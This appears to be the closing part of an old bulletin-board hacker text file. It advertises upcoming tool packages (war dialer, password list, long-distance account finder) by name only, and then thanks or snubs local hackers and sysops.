IBM Home Destruction Kit (v1.4) Critcal Mass#1 (138k+ of hack info!) SC/HA ToolBox Hacker! (v3.0) COMMING SOON!!!!!!!!!! INCLUDES!!!!!!!!! WarGame Dialer Repeat Dialer Sleep Function Dbase Hack (490+ most popular passwords!) LD account finder! Much more Theses are written by myself, other software by other members includes...... The c64-128 Home Destruction Kit! (v1.0?) COMMING SOON (by The Beaver) ToolBox Hacker 1.0 for the IBM c64 Apple Amiga (By The Shadow) COMMING SOON! Just keep a eye out for these, and other (if they agree to it) GrindLock products! Once again, Thanx To: All Florida area FIRN hackers, SF's and C.C.C Abigail, The Shadow (very special thanks to him), Eric, all korner hacker who give info, Killer (keep at it), The Baron, The Nut-Kracker My Dad (yes he knows I hack), and every hacker in the TLH area for just exsisting! And of course Mark for letting me use his board to post CM here in town, even though he get's hassled for it. All old C.C members that still hack. Pink Floyd, for the nylon. And much more! No Thanx Too, Once again: Doug, for nothing. All NFSA sysops, except for a few. Tom and Bob, after I thought they where ok guys (and I still do) for saying that I u/l trojans when I didn't. Why guys? Tally Net sysops, for killing this text. That remote off Legal3. All sysops that killed this text. Note: When I say 'no thanx to', its not a 'hit list', but it made me kind of mad.